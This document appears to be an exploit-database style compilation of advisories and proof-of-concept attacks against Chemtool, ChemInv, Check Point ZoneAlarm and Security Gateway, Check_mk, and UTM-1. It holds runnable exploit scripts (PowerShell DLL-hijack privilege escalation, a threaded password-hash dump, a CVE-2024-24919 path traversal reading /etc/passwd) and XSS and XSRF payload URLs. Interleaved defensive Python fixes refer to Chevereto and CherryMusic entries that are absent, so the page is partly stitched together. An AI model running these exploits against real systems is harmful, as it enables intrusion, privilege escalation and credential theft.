Chemtool 1.6.14 or older
Exploitation Technique:
=======================
Local
Severity Level:
===============
Medium
Technical Details & Description:
================================
A memory corruption vulnerability was detected in Chemtool 1.6.14. An
attacker can crash the software with a crafted input file.
An attacker can also crash the software by supplying a filename that is too long.
b77a8000-b77a9000 r--s 00000000 08:01 152558
/var/cache/fontconfig/3fe29f0c9fa221c8ee16555d4835b3ab-le32d4.cache-4
b77a9000-b77aa000 r--s 00000000 00:15 209651 /run/user/1000/dconf/user
b77aa000-b77bb000 r-xp 00000000 08:01 393480
/usr/lib/i386-linux-gnu/gtk-2.0/modules/liboverlay-scrollbar.so
b77bb000-b77bc000 r--p 00010000 08:01 393480
/usr/lib/i386-linux-gnu/gtk-2.0/modules/liboverlay-scrollbar.so
b77bc000-b77bd000 rw-p 00011000 08:01 393480
/usr/lib/i386-linux-gnu/gtk-2.0/modules/liboverlay-scrollbar.so
b77bd000-b77be000 rwxp 00000000 00:00 0
b77be000-b77bf000 r--p 00855000 08:01 274691
/usr/lib/locale/locale-archive
b77bf000-b77c0000 r--p 00596000 08:01 274691
/usr/lib/locale/locale-archive
b77c0000-b77c2000 rw-p 00000000 00:00 0
b77c2000-b77c3000 r-xp 00000000 00:00 0 [vdso]
b77c3000-b77e3000 r-xp 00000000 08:01 132074 /lib/i386-linux-gnu/
ld-2.19.so
b77e3000-b77e4000 r--p 0001f000 08:01 132074 /lib/i386-linux-gnu/
ld-2.19.so
b77e4000-b77e5000 rw-p 00020000 08:01 132074 /lib/i386-linux-gnu/
ld-2.19.so
bfeff000-bff21000 rw-p 00000000 00:00 0 [stack]
Aborted (core dumped)
Proof of Concept (PoC):
=======================
These vulnerabilities can be exploited by local attackers with user
interaction.
First test. An attacker can generate a malicious file (.png format). This file
can produce stack smashing.
#!/usr/bin/ruby
buf = "a"*3000
filename = "crash.png"
file = open(filename,'w')
file.write(buf)
file.close
puts "file created!"
Second test. An attacker can supply a filename that is too long. This
program expects to receive a parameter; if that parameter is too long, it will
crash.
$chemtool $(perl -e 'print "A"x900')
How to perform:
=======================
1) You can test it with gdb: attach it to the application.
2) Run it; now you can pass the "crash.png" file generated by the ruby
script above to the application. Alternatively, run it with a long argv[1] value.
When you perform the above steps the application will crash. Analyze it in gdb.
Solution - Fix & Patch:
=======================
Restrict the maximum working size. I believe that this bug doesn't have a
solution.
Security Risk:
==============
The security risk of the vulnerability is estimated as medium because of
the local crash method.
Authors:
==================
Pablo González
# Exploit Title: ChemInv 1.0 - Authenticated Persistent Cross-Site Scripting
# Exploit Author: Bobby Cooke
# Date: 2020-04-29
# Software Link: https://github.com/tmorrell/cheminv
# Software Info:
# "Cheminv is a web-based chemical inventory system. This responsive database provides an accessible way to organize and order chemicals, and is provided as an open-source package for all non-commercial users."
# "Cheminv was created by Thomas Morrell for the Haw Yang Lab at Princeton University"
# "Cheminv is based on ecDB www.ecDB.net, which was created by Nils Fredriksson aka. ElectricMan and designed by Buildlog."
# Version: 1
# Tested On: CentOS
# Vulnerability Type:
# ChemInv suffers from a persistent cross-site scripting (XSS) vulnerability. It can be exploited to make every user of the system with read access to the project execute malicious client-side code each time they view the 'Projects' or 'Add Chemicals' tab.
# The application's source code mitigates SQL injection (SQLi) by escaping input before it reaches the database, but it does not sanitize HTML or JavaScript, so injected markup is stored in the database and later rendered to other users.
# Vulnerable Source Code
## proj_list.php
include('include/include_proj_add.php');
$AddProj = new ProjAdd;
$AddProj->AddProj();

$proj_query = mysql_query("SELECT * FROM projects WHERE project_owner= $owner");
## include/include_proj_add.php
class ProjAdd {
    public function AddProj () {

        require_once('include/login/auth.php');
        include('include/mysql_connect.php');

        if(isset($_POST['submit'])) {
            $owner = $_SESSION['SESS_MEMBER_ID'];
            $name = mysql_real_escape_string($_POST['name']);

            if ($name == '') {
                echo '<div class="message red">';
                echo 'You have to specify a name!';
                echo '</div>';
            }
            else {
                $sql="INSERT into projects (project_owner, project_name) VALUES ('$owner', '$name')";
                $sql_exec = mysql_query($sql);
# Malicious POST Request to https://TARGET/proj_list.php
POST /proj_list.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://TARGET/proj_list.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 16
Connection: close
Cookie: PHPSESSID=7af5kg3to8fstfum0to1ukpb85
name=evilProject<script>alert('XSS');</script>&submit=
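The ChemInv snippet above escapes the name for SQL and then stores it, but nothing escapes it again when proj_list.php prints it; the Chevereto title injection earlier on this page is the same defect in attribute context. The example below is added here and is not ChemInv's or Chevereto's code: it uses sqlite3 as a stand-in for the MySQL backend and shows the two separate boundaries, a parameterised insert (so the value is never parsed as SQL) and HTML escaping at render time (so it is never parsed as markup), with a vulnerable renderer beside the fixed one. The function names are this example's own.

```python
"""SQL escaping and HTML escaping are different boundaries; each needs its own fix.
Added example, not ChemInv's or Chevereto's code; sqlite3 stands in for MySQL."""
import html
import sqlite3

def open_db():
    """In-memory stand-in for the projects table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE projects (project_owner INTEGER, project_name TEXT)")
    return conn

def add_project(conn, owner, name):
    """Parameterised insert: whatever the name contains, it is bound as data, never parsed as SQL.
    Returns the row count so the caller can confirm nothing else happened to the table."""
    conn.execute("INSERT INTO projects (project_owner, project_name) VALUES (?, ?)", (owner, name))
    return conn.execute("SELECT COUNT(*) FROM projects").fetchone()[0]

def project_names(conn, owner):
    return [row[0] for row in conn.execute(
        "SELECT project_name FROM projects WHERE project_owner = ?", (owner,))]

def render_unsafe(conn, owner):
    """What the vulnerable page effectively does: interpolate the stored name into HTML as-is."""
    return "".join(f"<li>{name}</li>" for name in project_names(conn, owner))

def render_safe(conn, owner):
    """Escape at the HTML boundary so the browser displays the characters instead of parsing them."""
    return "".join(f"<li>{html.escape(name, quote=True)}</li>" for name in project_names(conn, owner))

def image_title_attr(title):
    """Attribute context (the image title case): the value must be quoted AND escaped,
    otherwise a '"' in the title closes the attribute and the remainder becomes new markup."""
    return f'<img alt="{html.escape(title, quote=True)}">'

# Payloads taken from the advisories above; inert here, nothing renders them in a browser.
PROJECT_PAYLOAD = "evilProject<script>alert('XSS');</script>"
TITLE_PAYLOAD = '"><svg/onload=alert(1)>'

if __name__ == "__main__":
    conn = open_db()
    add_project(conn, 1, PROJECT_PAYLOAD)
    print("unsafe:", render_unsafe(conn, 1))
    print("safe:  ", render_safe(conn, 1))
    print("attr:  ", image_title_attr(TITLE_PAYLOAD))
```

Note that `mysql_real_escape_string` in the original is doing the first job (badly, since the interpolated query is still string-built) and nothing is doing the second; escaping on input would also be wrong, because the same stored value may later be emitted into JSON, a URL or an attribute, each with its own encoding rules.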
# Exploit Title: CheckPoint Endpoint Security Client/ZoneAlarm 15.4.062.17802 - Privilege Escalation
# Date: 2019-01-30
# Exploit Author: Jakub Palaczynski
# Vendor Homepage: https://www.checkpoint.com/
# Version: Check Point Endpoint Security VPN <= E80.87 Build 986009514
# Version: Check Point ZoneAlarm <= 15.4.062.17802
# CVE: CVE-2019-8452
Description:
============
It is possible to change the permissions of an arbitrary file so that the user has full control over it after exploitation, which results in Local Privilege Escalation.
It was found that Check Point software (Endpoint Security Client and ZoneAlarm) uses a tvDebug.log file stored in "C:\Windows\Internet Logs\tvDebug.log" or in ProgramData, for example "C:\ProgramData\CheckPoint\ZoneAlarm\Logs\tvDebug.log".
All authenticated users have full control over this log file, and it was found that the Check Point service writes to it with SYSTEM privileges.
However, this file could not be used for exploitation directly, as it is always held open by the Check Point service; this is, for example, why users cannot delete it under normal conditions (unless the service crashes and/or is restarted).
However, it was noticed that when this log file reaches some limit (depending on the software) it is archived to the same location and name but with a ZIP extension. The same permissions are set for this archive file, so all authenticated users can access it.
Taking all of this into account we can create an attack scenario:
1. If tvDebug.zip file exists then delete it
2. Create hardlink (using CreateHardlink.exe) named tvDebug.zip which points to other file that we would like to have permissions to (this file must not be taken by other process when Check Point service tries to use it)
3. Fill tvDebug.log log file above the limit. For ZoneAlarm it is 50Mb, for VPN it is 20Mb. It can be done by using software as normal user.
4. Restart system as service needs to be restarted to make an archive.
5. Now your file has permissions changed and you have all access to it.
6. If we pointed to "C:\Program Files (x86)\CheckPoint\Endpoint Connect\LogonISReg.dll" in step 2 then we can replace this DLL with custom one.
7. Click "VPN Options" in Client GUI and then close this windows. Closing "VPN Options" window forces LogonISReg.dll to be loaded with SYSTEM privileges.
Proof of Concept:
=================
# PoC written in PowerShell to fully exploit Check Point Endpoint Client. It can be used also to exploit ZoneAlarm.
# file that we want to have permissions to
# LogonISReg.dll is not used on startup and we can force to load it with SYSTEM privileges after exploitation
$file = "C:\Program Files (x86)\CheckPoint\Endpoint Connect\LogonISReg.dll"
# path to symboliclink testing tools CreateHardlink.exe
# CreateHardlink.exe is a tool created by James Forshaw - https://github.com/googleprojectzero/symboliclink-testing-tools
$hardlink = "C:\Temp\CreateHardlink.exe"
Write-Host "[!] Detecting Check Point software."
if ([System.IO.File]::Exists("$env:windir\Internet Logs\tvDebug.log")) {
$logfile = "$env:windir\Internet Logs\tvDebug.zip"
Write-Host "[+] Check Point Endpoint Security found."
}
elseif ([System.IO.File]::Exists("$env:programdata\CheckPoint\ZoneAlarm\Logs\tvDebug.log")) {
$logfile = "$env:programdata\CheckPoint\ZoneAlarm\Logs\tvDebug.zip"
Write-Host "[+] Check Point ZoneAlarm found."
}
else {
Write-Host "[-] Check Point software was not found."
}
Write-Host "[!] Trying to delete tvDebug.zip file."
if ([System.IO.File]::Exists($logfile)) {
while ([System.IO.File]::Exists($logfile)) { Remove-Item -Force -Path $logfile -ErrorAction SilentlyContinue }
Write-Host "[+] Successfully deleted tvDebug.zip archive file."
}
else {
Write-Host "[+] tvDebug.zip archive file was not found."
}
Write-Host "[!] Creating hardlink to a file that we would like to change permissions."
Start-Process -FilePath "cmd.exe" -ArgumentList "/c $hardlink `"$logfile`" `"$file`""
while (!([System.IO.File]::Exists($logfile))) { Sleep 1 }
Write-Host "[+] Hardlink successfully created."
Write-Host "[!] 1. Fill log file up to the limit and restart computer."
Write-Host "[!] 2. Now when permissions are changed replace LogonISReg.dll with your custom DLL."
Write-Host "[!] 3. Click VPN Options in Client GUI and close this window to force DLL load."
1. ADVISORY INFORMATION
=======================
Product: Check_mk
Vendor URL: https://mathias-kettner.de/check_mk.html
Type: Race Condition [CWE-362]
Date found: 2017-09-21
Date published: 2017-10-18
CVSSv3 Score: 7.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
CVE: CVE-2017-14955
2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.
3. VERSIONS AFFECTED
====================
Check_mk v1.2.8p25
Check_mk v1.2.8p25 Enterprise
older versions may be affected too.
4. INTRODUCTION
===============
Check_MK is a comprehensive IT monitoring solution in the tradition of Nagios.
Check_MK is available as Raw Edition, which is 100% pure open source, and as
Enterprise Edition with a lot of additional features and professional support.
(from the vendor's homepage)
5. VULNERABILITY DETAILS
========================
Check_mk is vulnerable to an unauthenticated information disclosure through a
race condition during the authentication process when trying to authenticate
with a valid username and an invalid password.
On a failed login, the application calls the function save_users(), which
performs two os.rename operations on the files "contacts.mk.new" and
"users.mk.new" (see /packages/check_mk/check_mk-1.2.8p25/web/htdocs/userdb.py):
[..]
# Check_MK's monitoring contacts
filename = root_dir + "contacts.mk.new"
out = create_user_file(filename, "w")
out.write("# Written by Multisite UserDB\n# encoding: utf-8\n\n")
out.write("contacts.update(\n%s\n)\n" % pprint.pformat(contacts))
out.close()
os.rename(filename, filename[:-4])
# Users with passwords for Multisite
filename = multisite_dir + "users.mk.new"
make_nagios_directory(multisite_dir)
out = create_user_file(filename, "w")
out.write("# Written by Multisite UserDB\n# encoding: utf-8\n\n")
out.write("multisite_users = \\\n%s\n" % pprint.pformat(users))
out.close()
os.rename(filename, filename[:-4])
[...]
When sending many concurrent authentication requests with an existing/valid
username, such as:
POST /check_mk/login.py HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---9519178121294961341040589727
Content-Length: 772
Connection: close
Upgrade-Insecure-Requests: 1
---9519178121294961341040589727
Content-Disposition: form-data; name="filled_in"
login
---9519178121294961341040589727
Content-Disposition: form-data; name="_login"
1
---9519178121294961341040589727
Content-Disposition: form-data; name="_origtarget"
index.py
---9519178121294961341040589727
Content-Disposition: form-data; name="_username"
omdadmin
---9519178121294961341040589727
Content-Disposition: form-data; name="_password"
welcome
---9519178121294961341040589727
Content-Disposition: form-data; name="_login"
Login
---9519178121294961341040589727--
Then it can happen that one of the two os.rename() calls references a
non-existent file that has just been renamed by another thread. This causes the
Python script to fail and throw a crash report, which discloses a variety of
sensitive information, such as internal server paths and account details including
hashed passwords:
Local Variables:
{'contacts': {u'admin': {'alias': u'Administrator',
'contactgroups': ['all'],
'disable_notifications': False,
'email': u'admin@example.com',
'enforce_pw_change': False,
'last_pw_change': 0,
'last_seen': 0.0,
'locked': False,
'num_failed': 0,
'pager': '',
'password': '$1$400000$13371337asdfasdf',
'roles': ['admin'],
'serial': 2},
A script to automatically exploit this vulnerability can be found on [0].
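The save_users() fragment above writes a fixed temporary name ("contacts.mk.new") and renames it over the live file; because failed logins also call it, two concurrent requests share that temporary file and whichever renames second finds it gone. The example below is added here and is not Check_mk's code: it reproduces the write-then-rename pattern in a racy form beside a race-free form that gives each writer its own temporary file in the same directory (so the final rename is still an atomic replace), and drives both with the same 50 concurrent callers as the PoC. Function names and the temporary directories are this example's own.

```python
"""Write-then-rename under concurrency: fixed temp name (racy) vs per-writer temp name.
Added example, not Check_mk's code."""
import ast
import os
import pprint
import tempfile
import threading

def new_dir():
    """Fresh directory standing in for root_dir in the fragment above."""
    return tempfile.mkdtemp(prefix="userdb-")

def save_racy(root_dir, data):
    """Fixed temp name, as in the fragment above: two callers share one file, and the
    second rename raises FileNotFoundError once the first has moved it."""
    tmp = os.path.join(root_dir, "contacts.mk.new")
    with open(tmp, "w") as out:
        out.write(pprint.pformat(data))
    os.rename(tmp, tmp[:-4])

def save_atomic(root_dir, data):
    """Each caller gets its own temp file in the target directory; os.replace then swaps it
    in atomically, so readers never see a torn file and no caller touches another's temp."""
    fd, tmp = tempfile.mkstemp(prefix="contacts.mk.", dir=root_dir)
    try:
        with os.fdopen(fd, "w") as out:
            out.write(pprint.pformat(data))
            out.flush()
            os.fsync(out.fileno())
        os.replace(tmp, os.path.join(root_dir, "contacts.mk"))
    except BaseException:
        # Never leave a half-written temp file behind on failure.
        if os.path.exists(tmp):
            os.unlink(tmp)
        raise

def hammer(save_fn, root_dir, n=50):
    """Run n concurrent saves (mirroring the 50-thread PoC) and return how many raised OSError,
    which is the exception that produces the crash report in the advisory."""
    errors = []
    guard = threading.Lock()

    def worker(i):
        try:
            save_fn(root_dir, {"admin": {"alias": "Administrator", "serial": i}})
        except OSError as exc:
            with guard:
                errors.append(exc)

    threads = [threading.Thread(target=worker, args=(i,)) for i in range(n)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return len(errors)

def load_contacts(root_dir):
    """Parse the final file; a complete, well-formed literal shows no torn write was published."""
    with open(os.path.join(root_dir, "contacts.mk")) as f:
        return ast.literal_eval(f.read())

if __name__ == "__main__":
    racy_dir, safe_dir = new_dir(), new_dir()
    print("racy saves that raised:  ", hammer(save_racy, racy_dir))
    print("atomic saves that raised:", hammer(save_atomic, safe_dir))
    print("final record:", load_contacts(safe_dir))
```

The racy count varies from run to run (it depends on thread scheduling), which is exactly why the PoC fires many requests at once. The second half of the fix is separate from the race: an unhandled exception in a login handler should never render local variables to an unauthenticated client, whatever caused it.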
6. POC
======
#!/usr/bin/python
# Exploit Title: Check_mk <= v1.2.8p25 save_users() Race Condition
# Version: <= 1.2.8p25
# Date: 2017-10-18
# Author: Julien Ahrens (@MrTuxracer)
# Homepage: https://www.rcesecurity.com
# Software Link: https://mathias-kettner.de/check_mk.html
# Tested on: 1.2.8p25
# CVE: CVE-2017-14955
#
# Howto / Notes:
# This scripts exploits the Race Condition in check_mk version 1.2.8p25 and
# below as described by CVE-2017-14955. You only need a valid username to
# dump all encrypted passwords and make sure to setup a local proxy to
# catch the dump. Happy brute forcing ;-)

import requests
import threading

try:
    from requests.packages.urllib3.exceptions import InsecureRequestWarning
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
except:
    pass

# Config Me
target_url = "https://localhost/check_mk/login.py"
target_username = "omdadmin"
proxies = {
    'http': 'http://127.0.0.1:8080',
    'https': 'http://127.0.0.1:8080',
}

def make_session():
    # multipart/form-data login request; '_login' appears twice in the original
    # dict literal, so only the last value ('Login') is actually sent
    v = requests.post(target_url, verify=False, proxies=proxies, files={
        'filled_in': (None, 'login'),
        '_login': (None, '1'),
        '_origtarget': (None, 'index.py'),
        '_username': (None, target_username),
        '_password': (None, 'random'),
        '_login': (None, 'Login'),
    })
    return v.content

NUM = 50
threads = []
for i in range(NUM):
    t = threading.Thread(target=make_session)
    threads.append(t)
    t.start()
7. RISK
=======
To successfully exploit this vulnerability an unauthenticated attacker must only
have network-level access to the application.
The vulnerability allows remote attackers to trigger an exception, which
discloses a variety of sensitive internal information such as:
- Local server paths
- Usernames
- Passwords (hashed)
- and user directory-specific attributes (i.e. LDAP)
8. SOLUTION
===========
Update to 1.2.8p26.
9. REPORT TIMELINE
==================
2017-09-21: Discovery of the vulnerability
2017-09-21: Sent limited information to publicly listed email address
2017-09-21: Vendor responds and asks for details
2017-09-21: Full vulnerability details sent to vendor
2017-09-25: Vendor pushes fix to git
2017-10-01: MITRE assigns CVE-2017-14955
2017-10-16: Fix confirmed
2017-10-18: Public disclosure
10. REFERENCES
==============
[0] https://www.rcesecurity.com/2017/10/cve-2017-14955-win-a-race-against-check-mk-to-dump-all-your-login-data/
[1] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14955
# Exploit Title: Check Point ZoneAlarm Local Privilege Escalation
# Date: 1/16/19
# Exploit Author: Chris Anastasio
# Vendor Homepage: https://www.zonealarm.com/software/free-antivirus/
# Software Link: Vulnerable Versions included in repo
# Version:
ZoneAlarm Free Antivirus + Firewall version: 15.3.064.17729
Vsmon version: 15.3.58.17668
Driver version: 15.1.29.17237
Antivirus engine version: 8.8.1.110
Antivirus signature DAT file version: 1297458144
# Tested on: Windows 7/Windows 10
# Vendor Disclosure: https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk142952
POC:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46189.zip
source: https://www.securityfocus.com/bid/50189/info
Check Point UTM-1 Edge and Safe are prone to multiple security vulnerabilities, including:
1. Multiple cross-site scripting vulnerabilities
2. Multiple HTML-injection vulnerabilities
3. Multiple cross-site request forgery vulnerabilities
4. Multiple URI-redirection vulnerabilities
5. An information-disclosure vulnerability
An attacker may leverage these issues to access sensitive information, redirect an unsuspecting victim to an attacker-controlled site, or steal cookie-based authentication credentials, to perform unauthorized actions in the context of a user's session.
Versions prior to Check Point UTM-1 Edge and Safe 8.2.44 are vulnerable.
Tested on versions 7.5.48x, 8.1.46x and 8.2.2x.
1) The following demonstrate the reflective XSS flaws:-
a) The Ufp.html page is vulnerable to XSS via the url parameter
It works by submitting a malicious url parameter to the ufp.html page
http://www.example.com/pub/ufp.html?url=";><script>alert(1)</script>&mask=000&swpreview=1
This works with firmware versions 7.5.48x, 8.1.46x and 8.2.2x.
b) The login page is also vulnerable to an XSS via the malicious session cookie
It works by submitting a malicious session cookie to the login page
Cookie: session="><script>alert(1)</script>
c) An authenticated XSS exists within the diagnostics command
http://www.example.com/diag_command.html?sw__ver=blah1&swdata=blah2&sw__custom='";);alert(1);//
(this might need to be submitted twice)
2) The following demonstrate the persistent XSS flaws and XSRF flaws:-
a) The blocked URL warning page is vulnerable to a persistent XSS attack placing any internal users at risk of attack
when the page is displayed.
First an attacker has to trick the administrator to follow a XSRF attack; the (swsessioncookie) session cookie for
simplicity sake is shown though JavaScript document.cookie can be used to subvert this protection (see paper).
http://www.example.com/UfpBlock.html?swcaller=UfpBlock.html&swsessioncookie=20KHYp5-oS7rKmS-a4rq4j&swsave=1&ufpblockhttps=0&ufpbreakframe=&backurl=WebRules.html&ufpblockterms=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
Firewall users then visiting blocked sites will have the blocked page displayed and the attack carried out.
http://www.example.com/pub/ufp.html?url=www.blockedUrl.com&mask=000&swpreview=1
b) The Wi-Fi hotspot landing page on Wi-Fi enabled firewalls is also vulnerable, with any user using the Wi-Fi access
point being at risk.
First an attacker has to trick the administrator to follow a XSRF attack, the (swsessioncookie) session cookie for
simplicity sake is shown though JavaScript document.cookie can be used to subvert this protection (see paper).
http://www.example.com/HotSpot.html?swcaller=HotSpot.html&swsessioncookie=20KHYp5-oS7rKmS-a4rq4j&swsave=1&hotspotnets=00000000000000000000000000000000000000&hotspotpass=1&hotspotmulti=1&hotspothttps=0&hotspotnet1=0&hotspotnet2=0&hotspotnet3=0&hotspotenf=0&hotspottitle=Welcome+to+My+HotSpot&hotspotterms=%22%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3E&thotspotpass=on&thotspotmulti=on
Firewall users then visiting the Wi-Fi landing page will then have the attack carried out.
http://www.example.com/pub/hotspot.html?swpreview=1
3) The following demonstrate the (authenticated) offsite redirection flaws:-
a) Enter the following URL to redirect
http://www.example.com/12?swcaller=http://www.procheckup.com
b) Enter the following URL and then press back button.
http://www.example.com/UfpBlock.html?backurl=http://www.procheckup.com
4) The following demonstrate the Information disclosure flaws (no authentication needed)
It was found that the /pub/test.html program disclosed information, regarding the patch level used, licensing and the
MAC addresses to unauthenticated users.
a) On early firmware versions 5.0.82x, 6.0.72x & 7.0.27x 7.5.48x
Just requesting http:// www.example.com/pub/test.html is sufficient
b) This no longer worked on versions 8.1.46x & 8.2.26x; however, adding the url parameter with a double quote
bypassed this check:
https:// www.example.com/pub/test.html?url="
# Exploit Title: Check Point Security Gateway - Information Disclosure (Unauthenticated)
# Exploit Author: Yesith Alvarez
# Vendor Homepage: https://support.checkpoint.com/results/sk/sk182336
# Version: R77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, R81.20
# CVE : CVE-2024-24919
from requests import Request, Session
import sys
import json

def title():
    print('''
_______ ________ ___ ___ ___ _ _ ___ _ _ ___ __ ___
/ ____\ \ / / ____| |__ \ / _ \__ \| || | |__ \| || | / _ \/_ |/ _ \
| | \ \ / /| |__ ______ ) | | | | ) | || |_ ______ ) | || || (_) || | (_) |
| | \ \/ / | __|______/ /| | | |/ /|__ _|______/ /|__ _\__, || |\__, |
| |____ \ / | |____ / /_| |_| / /_ | | / /_ | | / / | | / /
\_____| \/ |______| |____|\___/____| |_| |____| |_| /_/ |_| /_/
Author: Yesith Alvarez
Github: https://github.com/yealvarez
Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
''')

def exploit(url, path):
    url = url + '/clients/MyCRL'
    data = "aCSHELL/../../../../../../../../../../.." + path
    headers = {
        'Connection': 'keep-alive',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0'
    }
    s = Session()
    req = Request('POST', url, data=data, headers=headers)
    prepped = req.prepare()
    #del prepped.headers['Content-Type']
    resp = s.send(prepped,
                  verify=False,
                  timeout=15
                  )
    print(prepped.headers)
    print(url)
    print(resp.headers)
    print(resp.status_code)

if __name__ == '__main__':
    title()
    if len(sys.argv) < 3:
        print('[+] USAGE: python3 %s https://<target_url> path\n' % (sys.argv[0]))
        print('[+] EXAMPLE: python3 %s https://192.168.0.10 "/etc/passwd"\n' % (sys.argv[0]))
        exit(0)
    else:
        exploit(sys.argv[1], sys.argv[2])
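Two entries on this page are the same server-side mistake seen from different angles: the Cherry Music download endpoint accepted an absolute path ("/etc/passwd") and the Check Point MyCRL handler accepted a relative path that climbs out with "../" segments. The example below is added here and is not CherryMusic's or Check Point's code; it shows the os.path.join pitfall that makes the absolute case work, beside a containment check that anchors the request under the permitted root, resolves ".." and symlinks, and then proves with os.path.commonpath that the result is still inside. The function names and the constructed media root are this example's own.

```python
"""Path containment for endpoints that take a client-supplied file path.
Added example, not CherryMusic's or Check Point's code."""
import os
import tempfile

class PathRejected(ValueError):
    """Raised when a requested path resolves outside the permitted root."""

def resolve_unsafe(root, requested):
    """The pitfall: os.path.join discards root when the second argument is absolute,
    and it does nothing about '..' segments either."""
    return os.path.join(root, requested)

def resolve_contained(root, requested):
    """Anchor the request under root, collapse '..' and symlinks, then prove containment."""
    root_real = os.path.realpath(root)
    # Strip leading separators so an absolute request is still interpreted relative to root.
    relative = requested.lstrip("/\\")
    candidate = os.path.realpath(os.path.join(root_real, relative))
    # commonpath is the check that matters: a plain startswith() would accept '/srv/media2'
    # as being inside '/srv/media'.
    if os.path.commonpath([root_real, candidate]) != root_real:
        raise PathRejected(requested)
    if not os.path.isfile(candidate):
        raise FileNotFoundError(candidate)
    return candidate

def make_demo_root():
    """Constructed sample media root: one legitimate file under 'album/'."""
    root = tempfile.mkdtemp(prefix="media-")
    os.makedirs(os.path.join(root, "album"))
    with open(os.path.join(root, "album", "track.mp3"), "wb") as f:
        f.write(b"ID3 placeholder")
    return root

def classify(root, requested):
    """Summarise the policy decision for a request: 'served', 'rejected' or 'missing'."""
    try:
        resolve_contained(root, requested)
        return "served"
    except PathRejected:
        return "rejected"
    except FileNotFoundError:
        return "missing"

# Requests of the shapes described in the advisories above (constructed inputs).
SAMPLE_REQUESTS = [
    "album/track.mp3",
    "/etc/passwd",
    "../../../../etc/passwd",
    "aCSHELL/../../../../../../../../../../../etc/passwd",
]

if __name__ == "__main__":
    root = make_demo_root()
    for r in SAMPLE_REQUESTS:
        print(f"{r!r:55} unsafe={resolve_unsafe(root, r)!r:40} policy={classify(root, r)}")
```

In a real handler both `PathRejected` and `FileNotFoundError` should surface to the client as the same 404, since distinguishing them tells a caller which traversal attempts were close; the distinction is kept here only so the rejection can be logged and alerted on separately.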